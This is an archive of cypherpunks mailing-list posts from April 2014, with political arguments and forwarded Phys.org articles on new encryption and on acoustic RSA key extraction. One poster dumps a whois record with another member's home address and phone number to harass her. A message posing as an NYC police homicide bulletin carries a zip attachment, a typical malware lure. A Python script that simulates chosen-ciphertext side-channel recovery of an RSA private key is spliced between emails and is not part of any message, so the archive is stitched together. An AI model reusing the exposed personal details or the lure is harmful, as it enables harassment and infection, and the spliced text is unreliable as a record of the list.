From tpb-crypto at laposte.net Fri Apr 4 08:43:44 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 04 Apr 2014 17:43:44 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> Message-ID: <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> > Message of 04/04/14 17:28 > From: "Cari Machet" > if i am such a goddamn incomprehensible nothing why do you bother to argue > with me at all or why can you even comprehend enough of it to argue? > You keep feeling our inboxes with your nonsensical rants. In a more modern version of an old proverb: your fingertips are faster than your brain. > ouroboros > Incubus. > please do some research into new more democratic forms of journalism - > journalistic co-ops etc > That's as old as pissing forwards. From carimachet at gmail.com Fri Apr 4 10:57:26 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 17:57:26 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> Message-ID: On Fri, Apr 4, 2014 at 3:43 PM, wrote: > > Message of 04/04/14 17:28 > > From: "Cari Machet" > > if i am such a goddamn incomprehensible nothing why do you bother to > argue > > with me at all or why can you even comprehend enough of it to argue? > > > > You keep feeling our inboxes with your nonsensical rants. In a more modern > version of an old proverb: your fingertips are faster than your brain. 
> > i would never feel an inbox and am wholly against 'feeling inboxes' not down at all for that ever meow kitty kitty (is my insinuation made clear?) > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1990 bytes Desc: not available URL: From pc at loom.cc Fri Apr 4 14:58:58 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 17:58:58 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533F151F.6020801@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> <533F151F.6020801@cpunk.us> Message-ID: <533F2B22.9040007@loom.cc> Cypher wrote, On 04/04/2014 04:25 PM: > On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: >> Cypher wrote, On 04/03/2014 05:22 PM: > >>> But, please, instead of ranting and wild arm-waving, educate me >>> if I am wrong. I would certainly /love/ to see a workable, >>> large scale, anarchistic plan. > >> Please, no large scale plans, I beg you. I simply wish to see >> the emergent effects of countless individuals interacting with >> each other solely on the basis of mutual consent. That is all. > > Good response, Patrick. But how do you think we're going to get to > that? 
Without concerted action, and it has to be more than > everybody doing their own thing IMHO, how will that goal be > achieved? I hear a lot of anarchists saying what you say and it's a > fantastic goal. But how do we get there? An old friend of mine summed up the basic physics of the situation: > Massive enslavement is the norm because it is possible to derive > sufficient revenue from it to pay the costs of maintaining it. As > long as that existential fact is true it does not matter what most > people think or want. You mentioned that "concerted action" would have to be more than everybody doing their own thing. Not necessarily, if "doing your own thing" means conducting one's affairs in such a way that minimizes the net benefit to those who would restrict your freedom, while still providing a net benefit to yourself. That goes to the heart of my friend's point. He goes on to say that notions like "mass action" or "mass enlightenment" are just more collectivist drivel, and he's rather emphatic about it: > The orthodoxy is that all you have to do is teach most people the > truth and they will throw off their chains, since the rulers > depend for their power on fooling people into giving their consent. > This is hogwash belied by all human history. It is only credible to > people indoctrinated in the democratic myths that have arisen in > the last 200 years reinforced by collectivist thinking. It's all about the physics, though discussing the specifics can be delicate. -- Patrick From rysiek at hackerspace.pl Fri Apr 4 09:09:05 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 04 Apr 2014 18:09:05 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <533EBF67.6020708@loom.cc> Message-ID: <1975070.3dRqEqeRNU@lap> On Friday, 4 April 2014 15:20:19 Cari Machet wrote: > > Now THAT is a good point. I thought you were deriding the very concept > > of ownership. 
If you're saying that private property is such a good > > idea that maybe we should *try* it sometime, then I'm with you. > > o your funny Wait, whose funny? I thought it's their funny. It's definitely not my funny... -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From carimachet at gmail.com Fri Apr 4 11:09:25 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 18:09:25 +0000 Subject: [cryptography] Tails In-Reply-To: References: <533EAF1C.6090006@iang.org> Message-ID: On Fri, Apr 4, 2014 at 1:28 PM, John Young wrote: > Informative tweets on Tails security since the fund-raising announcement: > > http://cryptome.org/2014/04/tails-security.pdf > > thanks alexa is right need to make more tools then > dont care if it is hard to hack -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 1641 bytes Desc: not available URL: From juan.g71 at gmail.com Fri Apr 4 14:48:38 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Fri, 04 Apr 2014 18:48:38 -0300 Subject: Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <5CABDDDF0D3FDF731E730A9F@F74D39FA044AA309EAEA14B9> --On Thursday, April 03, 2014 8:12 PM +0000 Cari Machet wrote: > > yay to think the military would not want to expand its mandate when rummy > fought so hard for them to get ahead of the cia ... competition is weird > though it is possible - what are the thoughts on the cia as opposed to the > military running the drone program in this regard ? the pentagon was gonna > run it then it was decided no... Different government agencies are...just that. Different facets of the same organization. > > the competition between different agencies in the us is bazzzarrio i > cannot imagine how they deal with all the subcontractors - i am sure they > figure out ways to be cruel to them There may be some 'competition' in the sense that they have to somehow divide the spoils 'fairly', but there isn't any real competition in a monolithic criminal organization where all people agree on the core statist philosophy. Including the fucktards who pretend to be 'libertarians' and advocate 'limited' murder, I mean, 'government'. > > the thing is that there are different entities 'running the show' mostly > its your good ole transnational corporations and fucking autocrats - basic > mafia shit the junta aspect of the so called gov is just an arm of the > transnationals... They are partners. Furthermore, while companies, *in theory* exist only to serve customers, governments *in theory and practice* exist only to steal, extort, kidnap, murder, etc. >ever been to the strait of hormuz? no... > > to put the military beyond the transnationals is beyond naive its complete > blindness I don't. 
Politicians and 'business leaders' should be both hanged by their balls. > > >> >> >> >> > However, the pols, and CIA, wanted that very excess, >> > in particular for spying inside the US, ostensibly banned for the >> > CIA but now needed for terrorists inside. >> > >> > CIA (long FBI opponents) thought FBI could not cope with inside >> > terrorists, using 9/11 as an example, and advocated NSA involvement >> > with its much greater technical capability, but more importantly, its >> > military-privileged secrecy not susceptible to full congressional >> > oversight, courts and FOIA. >> > >> > The joint CIA-NSA Special Collection Service (SCS) has >> > been doing for decades what NSA is now alone accused of doing: >> > CIA provided the targets, NSA did the technical collection from >> > those global stations identified by xKeyscore (most in embassies >> > or nearby). >> > >> > What is bizarre is how little CIA is mentioned in news furor about >> > NSA, as if NSA did its work in isolation from the IC and without >> > oversight of the 3 branches. >> > >> > SCS also does burglaries, code snatches, decrypts, doc drops, >> > stings, ploys, blackmail, the panoply of CIA operations. The increased >> > civilian target panoply bestowed upon NSA came from CIA demands >> > channeled through ODNI. >> > >> > Reviewing what little has been released of the Snowden documents >> > they are quite similar to what SCS has been doing with the addition >> > of the US as target. FISA had to be rejiggered for the US domain. >> > >> > Most national leaders, like POTUS, are considered to be military >> > commanders thus fair game for NSA along with CIA. Nothing >> > exceptional about the recent revelations of spying on chiefs of >> > state. >> > >> > NSA technical collection capability was developed for the >> > military, not civilian use. Now expanded to CIA full dominance >> > territory. FISA had to be rejiggered for using it against civilians. >> > And is still being rejiggered these days. 
>> > >> > NSA's recent attempt to slough off Cybercom and return to >> > its military mission, has been rejected by the civilian overseers >> > following CIA guidance and fear-mongering of civilians, especially >> > those inside the US. The last thing CIA and its supporters want >> > is a revelation of its manipulation of civilian leaders >> > institutionalized by the 1947 National Security Act (also opposed by >> > the military). >> > >> > ----- >> > From ALERT at nyc.gov Fri Apr 4 12:05:09 2014 From: ALERT at nyc.gov (ALERT at nyc.gov) Date: Fri, 4 Apr 2014 21:05:09 +0200 Subject: Homicide Suspect Message-ID: <63049.3010706@nyc.gov> Bulletin Headline: HOMICIDE SUSPECT Sending Agency: New York City Police Sending Location: US - NY - New York Police Bulletin Case#: 14-71643 Bulletin Author: BARILLAS #7351 Sending User #: 07183 APBnet Version: 238568 The bulletin is a pdf attachment to this email. The Adobe Reader (from Adobe.com) will display and print the bulletin best. You can Not reply to the bulletin by clicking on the Reply button in your email software. -------------- next part -------------- A non-text attachment was scrubbed... Name: Homicide-case#821.zip Type: application/zip Size: 6341 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Fri Apr 4 22:30:23 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Fri, 4 Apr 2014 22:30:23 -0700 (PDT) Subject: From Phys.org Message-ID: <1396675823.44381.YahooMailNeo@web126204.mail.ne1.yahoo.com> http://phys.org/news/2014-04-unbreakable-codes-nature.html#nRlv A revolutionary new method of encrypting confidential information has been patented by scientists at Lancaster University. Read more at: http://phys.org/news/2014-04-unbreakable-codes-nature.html#jCp They have been inspired by their discoveries from human biology, which model how the heart and lungs coordinate their rhythms by passing information between each other. 
A mathematical model based on the complex interaction between these organs has now been transferred to the world of modern communications. This discovery could transform daily life which is reliant on secure electronic communications for everything from mobiles to sensor networks and the internet.

Every device, from your car key to online bank account, contains different identification codes enabling information to be transferred in confidence. But the race to outwit the hackers means there is a continual demand for better encryption methods.

Inspiration for the new method of encryption came from interdisciplinary research in the Physics Department (www.physics.lancs.ac.uk/research/nonlinear-and-biomedical-physics) by Dr Tomislav Stankovski, Professor Peter McClintock, and Professor Aneta Stefanovska, and the patent includes Dr Robert Young.

Professor McClintock commented that this is a significant discovery. He said: "This promises an encryption scheme that is so nearly unbreakable that it will be equally unwelcome to internet criminals and official eavesdroppers."

Professor Stefanovska emphasized the interdisciplinary aspect: "As so often happens with important breakthroughs, this discovery was made right on the boundary between two different subjects – because we were applying physics to biology."

Dr Stankovski said: "Here we offer a novel encryption scheme derived from biology, radically different from any earlier procedure. Inspired by the time-varying nature of the cardio-respiratory coupling functions recently discovered in humans, we propose a new encryption scheme that is highly resistant to conventional methods of attack."

The advantage of this discovery is that it offers an infinite number of choices for the secret encryption key shared between the sender and receiver. This makes it virtually impossible for hackers and eavesdroppers to crack the code.
The new method is exceptionally resistant to interference from the random fluctuations or "noise" which affects all communications systems. It can also transmit several different information streams simultaneously, enabling all the digital devices in the home, for example, to operate on one encryption key instead of dozens of different ones.

Explore further: Advancing privacy and security in the cloud

More information: Tomislav Stankovski, Peter V. E. McClintock, and Aneta Stefanovska, "Coupling Functions Enable Secure Communications," American Physical Society's journal Physical Review X, journals.aps.org/prx/abstract/10.1103/PhysRevX.4.011026

Journal reference: Physical Review X

Provided by Lancaster University

Read more at: http://phys.org/news/2014-04-unbreakable-codes-nature.html#jCp

-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 9734 bytes Desc: not available URL:

From jamesdbell9 at yahoo.com Fri Apr 4 22:44:37 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Fri, 4 Apr 2014 22:44:37 -0700 (PDT)
Subject: Acoustic bugging of computers
Message-ID: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com>

http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#nRlv

(Phys.org) —A trio of researchers in Israel has discovered that it is possible to crack 4096-bit RSA encryption keys using a microphone to listen to high-pitch noises generated by internal computer components. Adi Shamir (co-inventor of RSA), Daniel Genkin and Eran Tromer have published a research paper describing the technique on a Tel Aviv University server.

Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp

Computers make noises, the researchers explain, far beyond the whirring of the fan. The CPU, for example, emits a high pitched noise as it operates, fluctuating depending on which operations it is performing—other components do likewise.
Suspecting that they might be able to exploit this characteristic of computers, the researchers set about creating software to interpret noise data obtained using simple microphones and very little other equipment. They also focused exclusively on trying to achieve one single feat: deciphering an RSA encryption key. After much trial and effort, the researchers found it could be done without much effort.

Listening and detecting the noise made by a computer as it processes a single character in an encryption key would be impossible, of course, so the researchers devised a method that causes the noise to be repeated enough times in a row to enable capture of its signal. And that can only happen if the attacker is able to send a cyphertext to the machine that is to be attacked and have it processed. The cyphertext contains code that causes looping. By listening to how the computer processes the cyphertext, the researchers can map the noises made by the computer as it crunches different characters, thereby allowing encryption keys sent by others to be cracked.

What's perhaps most frightening about this method is how easily it can be ported to various machines. The researchers found, for example, that by using a laptop and simple hardware and software they were able to crack encryption keys on a second laptop. Next, they did the same thing using a cell phone as the listening device. They suggest it could also be packaged completely in software and sent out as malware, hacking encryption keys on infected devices and sending them back to the hacker.

As a side-note, the researchers also found that low-bandwidth attacks on computers are also possible by measuring the electrical potential of a computer's chassis while the circuitry is busy doing its work.
Explore further: Researchers at Toshiba design quantum network for secure communications More information: RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis: www.tau.ac.il/~tromer/papers/acoustic-20131218.pdf Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7192 bytes Desc: not available URL: From dan at geer.org Fri Apr 4 19:44:49 2014 From: dan at geer.org (dan at geer.org) Date: Fri, 04 Apr 2014 22:44:49 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: Your message of "Fri, 04 Apr 2014 13:56:18 EDT." <533EF242.5010604@loom.cc> Message-ID: <20140405024449.EF1112280DB@palinka.tinho.net> | You may not believe in scarcity, but I know one thing for a fact. I | have a limited amount of food in my refrigerator, and a limited | tolerance for strangers in my house. You may not call that "scarcity" | but it sure sounds like scarcity to me. So I'll say it again: if I | wake up one morning and find you in my house eating my food, you-gonna | be in big trouble Lucy. And return the favor; Cari's kitchen is ostensibly at % whois Globalrevops.org ... Tech ID:CR106626965 Tech Name:Cari machet Tech Organization:carimachet Tech Street: 3123 vernon blvd Tech City:Astoria Tech State/Province:New York Tech Postal Code:11106 Tech Country:US Tech Phone:+1.6466526434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email:cari_machet at me.com From jamesdbell9 at yahoo.com Sat Apr 5 01:16:13 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 5 Apr 2014 01:16:13 -0700 (PDT) Subject: Acoustic bugging of computers In-Reply-To: References: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com> Message-ID: <1396685773.2614.YahooMailNeo@web126205.mail.ne1.yahoo.com> Well, I posted the article, but don't necessarily ratify the content.  
However, I have never had much confidence in the RF (radio-frequency) security of computers. That point was driven home to me in mid 1977, when I built a microprocessor-trainer board called a "Dyna Micro" (http://en.wikipedia.org/wiki/Single-board_computer). It was uncased, and I ran it near an AM/FM radio. While listening to the AM band, away from an active station, it made numerous audio sounds as it went through the program of the keyboard scanner and programs that I entered. It was obvious that information could be transferred by RF, although at the time I wasn't particularly concerned about the possibility.

In about 1983, I visited Washington DC, and attended some sort of military electronics convention (invited by a customer of my company, SemiDisk Systems, Inc) and I was introduced to the concept of "Tempest" shielding.

In the summer of 2002, while a guest at the "Gated Community" of USP Atwater, California, I worked for the Federal Prison Industries ("Unicor") tearing apart electronic hardware, mostly computer monitors. I was the only person there, either prisoner or staff, who understood what the parts were which were on the boards. Very rarely, a computer monitor came through which I recognized was a shielded, "Tempest"-grade monitor.

Jim Bell

________________________________
From: Cypher
To: jim bell
Cc: "cypherpunks at cpunks.org"
Sent: Saturday, April 5, 2014 12:34 AM
Subject: Re: Acoustic bugging of computers

> I saw this a while back and really question its usability. While it's *technically* possible, it seems far too complex for the average hacker and far too risky for the intel community. People who use encryption tend to be slightly more paranoid than the average user. Suddenly receiving a piece of encrypted, nonsense email might be enough to get their key. But I also suspect that, in many cases, that key would quickly be revoked and reissued.
> Sent from my mobile device
>
> On Apr 5, 2014, at 0:44, jim bell wrote:
>
> http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#nRlv
>
> (Phys.org) —A trio of researchers in Israel has discovered that it is possible to crack 4096-bit RSA encryption keys using a microphone to listen to high-pitch noises generated by internal computer components. Adi Shamir (co-inventor of RSA), Daniel Genkin and Eran Tromer have published a research paper describing the technique on a Tel Aviv University server.
>
> Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp
>
> Computers make noises, the researchers explain, far beyond the whirring of the fan. The CPU, for example, emits a high pitched noise as it operates, fluctuating depending on which operations it is performing—other components do likewise. Suspecting that they might be able to exploit this characteristic of computers, the researchers set about creating software to interpret noise data obtained using simple microphones and very little other equipment. They also focused exclusively on trying to achieve one single feat: deciphering an RSA encryption key. After much trial and effort, the researchers found it could be done without much effort.
>
> Listening and detecting the noise made by a computer as it processes a single character in an encryption key would be impossible, of course, so the researchers devised a method that causes the noise to be repeated enough times in a row to enable capture of its signal. And that can only happen if the attacker is able to send a cyphertext to the machine that is to be attacked and have it processed. The cyphertext contains code that causes looping. By listening to how the computer processes the cyphertext, the researchers can map the noises made by the computer as it crunches different characters, thereby allowing encryption keys sent by others to be cracked.
> What's perhaps most frightening about this method is how easily it can be ported to various machines. The researchers found, for example, that by using a laptop and simple hardware and software they were able to crack encryption keys on a second laptop. Next, they did the same thing using a cell phone as the listening device. They suggest it could also be packaged completely in software and sent out as malware, hacking encryption keys on infected devices and sending them back to the hacker.
>
> As a side-note, the researchers also found that low-bandwidth attacks on computers are also possible by measuring the electrical potential of a computer's chassis while the circuitry is busy doing its work.
>
> Explore further: Researchers at Toshiba design quantum network for secure communications
>
> More information: RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis: www.tau.ac.il/~tromer/papers/acoustic-20131218.pdf
>
> Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp

-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 11823 bytes Desc: not available URL:

From cypher at cpunk.us Sat Apr 5 00:34:59 2014
From: cypher at cpunk.us (Cypher)
Date: Sat, 5 Apr 2014 02:34:59 -0500
Subject: Acoustic bugging of computers
In-Reply-To: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com>
References: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com>
Message-ID:

I saw this a while back and really question its usability. While it's *technically* possible, it seems far too complex for the average hacker and far too risky for the intel community. People who use encryption tend to be slightly more paranoid than the average user. Suddenly receiving a piece of encrypted, nonsense email might be enough to get their key. But I also suspect that, in many cases, that key would quickly be revoked and reissued.
Sent from my mobile device

On Apr 5, 2014, at 0:44, jim bell wrote:

> http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#nRlv
>
> (Phys.org) —A trio of researchers in Israel has discovered that it is possible to crack 4096-bit RSA encryption keys using a microphone to listen to high-pitch noises generated by internal computer components. Adi Shamir (co-inventor of RSA), Daniel Genkin and Eran Tromer have published a research paper describing the technique on a Tel Aviv University server.
>
> Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp
>
> Computers make noises, the researchers explain, far beyond the whirring of the fan. The CPU, for example, emits a high pitched noise as it operates, fluctuating depending on which operations it is performing—other components do likewise. Suspecting that they might be able to exploit this characteristic of computers, the researchers set about creating software to interpret noise data obtained using simple microphones and very little other equipment. They also focused exclusively on trying to achieve one single feat: deciphering an RSA encryption key. After much trial and effort, the researchers found it could be done without much effort.
>
> Listening and detecting the noise made by a computer as it processes a single character in an encryption key would be impossible, of course, so the researchers devised a method that causes the noise to be repeated enough times in a row to enable capture of its signal. And that can only happen if the attacker is able to send a cyphertext to the machine that is to be attacked and have it processed. The cyphertext contains code that causes looping. By listening to how the computer processes the cyphertext, the researchers can map the noises made by the computer as it crunches different characters, thereby allowing encryption keys sent by others to be cracked.
> What's perhaps most frightening about this method is how easily it can be ported to various machines. The researchers found, for example, that by using a laptop and simple hardware and software they were able to crack encryption keys on a second laptop. Next, they did the same thing using a cell phone as the listening device. They suggest it could also be packaged completely in software and sent out as malware, hacking encryption keys on infected devices and sending them back to the hacker.
>
> As a side-note, the researchers also found that low-bandwidth attacks on computers are also possible by measuring the electrical potential of a computer's chassis while the circuitry is busy doing its work.
>
> Explore further: Researchers at Toshiba design quantum network for secure communications
>
> More information: RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis: www.tau.ac.il/~tromer/papers/acoustic-20131218.pdf
>
> Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp

-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 8241 bytes Desc: not available URL:

From hettinga at gmail.com Sat Apr 5 02:18:44 2014
From: hettinga at gmail.com (Robert Hettinga)
Date: Sat, 5 Apr 2014 05:18:44 -0400
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <20140405024449.EF1112280DB@palinka.tinho.net>
References: <20140405024449.EF1112280DB@palinka.tinho.net>
Message-ID:

On Apr 4, 2014, at 10:44 PM, dan at geer.org wrote:

> Tech ID:CR106626965

I haven’t had this much fun since the hogs ate my little brother, I tellyawhut…

*Munches popcorn…*

Cheers,
RAH
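The chosen-ciphertext key extraction that the forwarded Phys.org piece and Cypher's reply in the "Acoustic bugging of computers" thread discuss, reduced to a runnable simulation. This is an added example, not code from any message in the thread or from Genkin, Shamir and Tromer's paper. It shows the shape of the attack: the attacker knows only (n, e), sends ciphertexts of the form prefix||0||11...1, and learns a single bit per decryption, whether the q-side CRT reduction left the ciphertext unchanged (c < q), which is enough to recover q one bit at a time and then the whole private key. Everything physical is assumed away: leak_oracle stands in for the acoustic classifier (in the paper that bit is read from the sound of the exponentiation and needs repeated measurements per bit, and the real attack also has to deal with GnuPG's actual arithmetic and the last few bits of q); the toy key sizes, the seed and the function names are this example's own choices.

```python
"""
Simulated chosen-ciphertext side-channel key extraction against RSA-CRT
(added example; the side channel itself is idealised, see leak_oracle).
Requires Python 3.8+ for pow(x, -1, m).
"""
import random


def is_probable_prime(n, rng, rounds=16):
    """Miller-Rabin primality test (probabilistic, good enough for a demo)."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits, rng):
    """Odd prime of exactly `bits` bits (top bit set), as real generators do."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand, rng):
            return cand


def generate_key(bits, rng, e=65537):
    """Toy RSA key with balanced primes; n has exactly `bits` bits."""
    while True:
        p, q = random_prime(bits // 2, rng), random_prime(bits // 2, rng)
        n = p * q
        if p != q and n.bit_length() == bits and (p - 1) % e and (q - 1) % e:
            break
    return {"n": n, "e": e, "d": pow(e, -1, (p - 1) * (q - 1)), "p": p, "q": q}


def decrypt_crt(c, key):
    """RSA-CRT decryption, the shape of the victim's code in the attack."""
    p, q, d = key["p"], key["q"], key["d"]
    m_p = pow(c % p, d % (p - 1), p)
    m_q = pow(c % q, d % (q - 1), q)        # c % q is the leaking reduction
    h = (pow(q, -1, p) * (m_p - m_q)) % p   # Garner recombination
    return m_q + h * q


def leak_oracle(c, key):
    """ASSUMED stand-in for the acoustic classifier: True iff c mod q == c.
    In the paper this is what the attacker distinguishes from the sound of
    the exponentiation; here it is computed directly from the secret q."""
    return c % key["q"] == c


def recover_q(qbits, oracle):
    """Adaptive MSB-first binary search, one oracle query per bit of q.

    With the top k bits of q known (prefix), query c = prefix||0||11...1:
    c < q  <=>  q >= prefix||1||00...0  <=>  the next bit of q is 1.
    """
    prefix = 1                               # top bit of q is always set
    for k in range(1, qbits):
        threshold = ((prefix << 1) | 1) << (qbits - k - 1)
        bit = 1 if oracle(threshold - 1) else 0
        prefix = (prefix << 1) | bit
    return prefix


def simulate_attack(bits=512, seed=1):
    """Generate a key, attack it using only (n, e) plus the oracle, and
    report whether the recovered private key decrypts a test message."""
    rng = random.Random(seed)
    key = generate_key(bits, rng)
    n, e = key["n"], key["e"]
    qbits = n.bit_length() // 2              # attacker assumes balanced primes
    q = recover_q(qbits, lambda c: leak_oracle(c, key))
    result = {"queries": qbits - 1, "recovered": q == key["q"], "decrypts": False}
    if n % q == 0:
        p = n // q
        stolen = {"p": p, "q": q, "d": pow(e, -1, (p - 1) * (q - 1))}
        m = rng.randrange(2, n)
        result["decrypts"] = decrypt_crt(pow(m, e, n), stolen) == m
    return result


if __name__ == "__main__":
    print(simulate_attack())
```

Run stand-alone it prints the query count and whether the stolen key decrypts. The point that bears on Cypher's objection is that every query is ordinary-looking ciphertext handled by a completely standard decryption, so the victim sees nothing except mail that decrypts to garbage; revoking the key afterwards only helps if the victim notices.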
From hettinga at gmail.com Sat Apr 5 02:19:52 2014
From: hettinga at gmail.com (Robert Hettinga)
Date: Sat, 5 Apr 2014 05:19:52 -0400
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net>
Message-ID:

On Apr 5, 2014, at 3:26 AM, Cari Machet wrote:

> capitalist

Dang.

Long knives have come out.

Cheers,
RAH

-------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL:

From hettinga at gmail.com Sat Apr 5 02:22:47 2014
From: hettinga at gmail.com (Robert Hettinga)
Date: Sat, 5 Apr 2014 05:22:47 -0400
Subject: Acoustic bugging of computers
In-Reply-To:
References: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com>
Message-ID: <921A08FF-E764-49FC-BF58-DBFA0CE3D8E3@gmail.com>

Adi’s really a hoot with this shit. Reading the keys offa smart card by using power analysis, finding the keys on a hard drive by looking for entropy, &cet.

Cheers,
RAH

-------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL:

From carimachet at gmail.com Sat Apr 5 00:19:24 2014
From: carimachet at gmail.com (Cari Machet)
Date: Sat, 5 Apr 2014 07:19:24 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <20140405024449.EF1112280DB@palinka.tinho.net>
References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net>
Message-ID:

what a total fuck and completely inaccurate i am not even in the US so fuck off - totally sick shit dan

On Sat, Apr 5, 2014 at 2:44 AM, wrote:

> | You may not believe in scarcity, but I know one thing for a fact.
I > | have a limited amount of food in my refrigerator, and a limited > | tolerance for strangers in my house. You may not call that "scarcity" > | but it sure sounds like scarcity to me. So I'll say it again: if I > | wake up one morning and find you in my house eating my food, you-gonna > | be in big trouble Lucy. > > And return the favor; Cari's kitchen is ostensibly at > > % whois Globalrevops.org > ... > Tech ID:CR106626965 > Tech Name:Cari machet > Tech Organization:carimachet > Tech Street: 3123 vernon blvd > Tech City:Astoria > Tech State/Province:New York > Tech Postal Code:11106 > Tech Country:US > Tech Phone:+1.6466526434 > Tech Phone Ext: > Tech Fax: > Tech Fax Ext: > Tech Email:cari_machet at me.com > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
